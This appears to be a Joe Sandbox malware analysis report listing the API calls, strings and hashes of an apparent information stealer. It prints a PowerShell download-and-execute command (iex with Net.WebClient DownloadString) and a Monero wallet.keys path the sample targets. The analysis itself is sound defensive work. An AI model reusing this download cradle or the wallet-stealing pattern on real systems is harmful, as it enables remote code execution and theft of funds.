                                  • Instruction ID: 44c94b83fcec887db774ef67435f5c9f93f7f82c72ba9c04d834e74fe84e309c
                                  • Opcode Fuzzy Hash: b92121a10b5329cf9943744802a09edef387314644850ad491a2332cb6a79f0f
                                  • Instruction Fuzzy Hash: EF215EB1E44208ABDB14DFD4DC49FAEBBB8FB44B50F508119F619BB280D77869018BA5
                                  Function 00F783DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F78426
                                  • wsprintfA.USER32 ref: 00F78459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F7847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F7848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F78499
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,016FDB68,00000000,000F003F,?,00000400), ref: 00F784EC
                                  • lstrlen.KERNEL32(?), ref: 00F78501
                                  • RegQueryValueExA.ADVAPI32(00000000,016FDDF0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00F80B34), ref: 00F78599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F78608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F7861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: edba641afb8c72fdd548069c83f8c990ebe55bedf908b9d14ff18a46d08496fa
                                  • Instruction ID: 49dce3dd06af176a60ba30288527f5dbd450ca16c30ad150df3c00574d20654f
                                  • Opcode Fuzzy Hash: edba641afb8c72fdd548069c83f8c990ebe55bedf908b9d14ff18a46d08496fa
                                  • Instruction Fuzzy Hash: 77210A71940218ABDB68DB54DC85FE9B7B8FF48700F40C1A9E60997140DF716A86CFD4
                                  Function 00F77690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F776A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F776AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,016EBB60,00000000,00020119,00000000), ref: 00F776DD
                                  • RegQueryValueExA.ADVAPI32(00000000,016FDDD8,00000000,00000000,?,000000FF), ref: 00F776FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F77708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: dfe12cfb7d5fadea00dfcfed3028379886bcbac0a9f338b0661f37859fdb265c
                                  • Instruction ID: 52b309d373d4dfdc2954cd5c285e5450bbdfb7dd603fdd97dca2c932c9fe974a
                                  • Opcode Fuzzy Hash: dfe12cfb7d5fadea00dfcfed3028379886bcbac0a9f338b0661f37859fdb265c
                                  • Instruction Fuzzy Hash: EE01A2B5A04304BBD718EBE4EC49FBEBBB8EF48701F408065FA15D7284D6749944DB51
                                  Function 00F77720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F77734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F7773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,016EBB60,00000000,00020119,00F776B9), ref: 00F7775B
                                  • RegQueryValueExA.ADVAPI32(00F776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00F7777A
                                  • RegCloseKey.ADVAPI32(00F776B9), ref: 00F77784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 95c10b55d4bb53f06e75e7a5ee728bbe61d08e86f2bef0967a3347ab6dfac91b
                                  • Instruction ID: db8b5a99bc85d5f578084da20c8b7fbd3e75177bba90af0cd4c6398cd24cb484
                                  • Opcode Fuzzy Hash: 95c10b55d4bb53f06e75e7a5ee728bbe61d08e86f2bef0967a3347ab6dfac91b
                                  • Instruction Fuzzy Hash: 980184B5A40308BBD714DBE0EC4AFBEBBB8EF04701F404065FA15A7284DA745540CB51
                                  Function 00F699C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F699EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F69A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00F69A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,00F6148F,00000000), ref: 00F69A5A
                                  • LocalFree.KERNEL32(00F6148F), ref: 00F69A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00F69A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 2da70650d72dde656404721c9cceb16a7d534bcda6f421c752966b63d7f7ac7e
                                  • Instruction ID: 68dc2d2417c70ff9c66414b316c0e280272ab39ded81895a3f3d3a94ee338942
                                  • Opcode Fuzzy Hash: 2da70650d72dde656404721c9cceb16a7d534bcda6f421c752966b63d7f7ac7e
                                  • Instruction Fuzzy Hash: 243118B4E00209EFDB24CF94D885BAE7BF9FF48310F108158E915A7294D778A981DFA1
                                  Function 00F74780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,016FDF28), ref: 00F747DB
                                    • Part of subcall function 00F78DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F78E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F74801
                                  • lstrcat.KERNEL32(?,?), ref: 00F74820
                                  • lstrcat.KERNEL32(?,?), ref: 00F74834
                                  • lstrcat.KERNEL32(?,016EB1A8), ref: 00F74847
                                  • lstrcat.KERNEL32(?,?), ref: 00F7485B
                                  • lstrcat.KERNEL32(?,016FD3B8), ref: 00F7486F
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F78D90: GetFileAttributesA.KERNEL32(00000000,?,00F61B54,?,?,00F8564C,?,?,00F80E1F), ref: 00F78D9F
                                    • Part of subcall function 00F74570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F74580
                                    • Part of subcall function 00F74570: RtlAllocateHeap.NTDLL(00000000), ref: 00F74587
                                    • Part of subcall function 00F74570: wsprintfA.USER32 ref: 00F745A6
                                    • Part of subcall function 00F74570: FindFirstFileA.KERNEL32(?,?), ref: 00F745BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 7b64a68ddc035d8b3d6079899e05f9144b83d74976b51fa9b31979276eb6adcc
                                  • Instruction ID: 3172c5169126142cf0298c850ae287ca102dcc9a51e1a1633810110f949bb994
                                  • Opcode Fuzzy Hash: 7b64a68ddc035d8b3d6079899e05f9144b83d74976b51fa9b31979276eb6adcc
                                  • Instruction Fuzzy Hash: 913194B294020857CB64F7B0DC89EED777CAF48700F40859AB31996081EE7897C9DB92
                                  Function 00F72C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00F72D85
                                  Strings
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00F72CC4
                                  • <, xrefs: 00F72D39
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00F72D04
                                  • ')", xrefs: 00F72CB3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: cb105ed64ecba78dd7b546717338db6d0c48ae53f36941b5cb37f61f3afb22e1
                                  • Instruction ID: bfeb51f8d88c0f0c6927261ecfa3ede44a9e8a9db6914013651bf85e9f32a847
                                  • Opcode Fuzzy Hash: cb105ed64ecba78dd7b546717338db6d0c48ae53f36941b5cb37f61f3afb22e1
                                  • Instruction Fuzzy Hash: D141C171C101089ADB54FBA0CC95FDEBB74AF50300F41812AE11AA7191DF786A5AEF93
                                  Function 00F69E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00F69F41
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: f58019a3ceebbc182c1a167ae86fcd6872576fdc4c6aafde45ab0eb4210dae26
                                  • Instruction ID: f36c505345f6282f8cb163d5303ff6eba33efbe3db2fb155ac6e31af47db490e
                                  • Opcode Fuzzy Hash: f58019a3ceebbc182c1a167ae86fcd6872576fdc4c6aafde45ab0eb4210dae26
                                  • Instruction Fuzzy Hash: BD613471A00248EBDB28EFA4CC96FED7775BF84304F448119F90A5F191DB786A06EB52
                                  Function 00F740B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,016FD378,00000000,00020119,?), ref: 00F740F4
                                  • RegQueryValueExA.ADVAPI32(?,016FDFB8,00000000,00000000,00000000,000000FF), ref: 00F74118
                                  • RegCloseKey.ADVAPI32(?), ref: 00F74122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F74147
                                  • lstrcat.KERNEL32(?,016FDFD0), ref: 00F7415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: b36c8a11f438ad85383c9a9811ab5a007fd836f623d548d647f368d78bf453f2
                                  • Instruction ID: 44ee069b32f32d1aa15b87af0feb645b0d262a4e078b0c8271b331be186e4216
                                  • Opcode Fuzzy Hash: b36c8a11f438ad85383c9a9811ab5a007fd836f623d548d647f368d78bf453f2
                                  • Instruction Fuzzy Hash: 1441DB7690010867DB28EBA0EC46FFE773CBB88300F448559B62A57185EA755B88DB92
                                  Function 00F76920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00F7696C
                                  • sscanf.NTDLL ref: 00F76999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F769B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F769C0
                                  • ExitProcess.KERNEL32 ref: 00F769DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 8d402dd3cd16b29a48a632b618bb9dae050fa652a25ba5096a643d46797656cf
                                  • Instruction ID: ac6f5b269b0bda6193b82edde238bae5085eb44d01be53786ef214d185c1c3fc
                                  • Opcode Fuzzy Hash: 8d402dd3cd16b29a48a632b618bb9dae050fa652a25ba5096a643d46797656cf
                                  • Instruction Fuzzy Hash: 7021FC75D00208ABCF48EFE4E9459EEBBB9FF48300F04852EE51AE3244EB345608CB65
                                  Function 00F77E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F77E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F77E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,016EBB98,00000000,00020119,?), ref: 00F77E5E
                                  • RegQueryValueExA.ADVAPI32(?,016FD258,00000000,00000000,000000FF,000000FF), ref: 00F77E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00F77E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
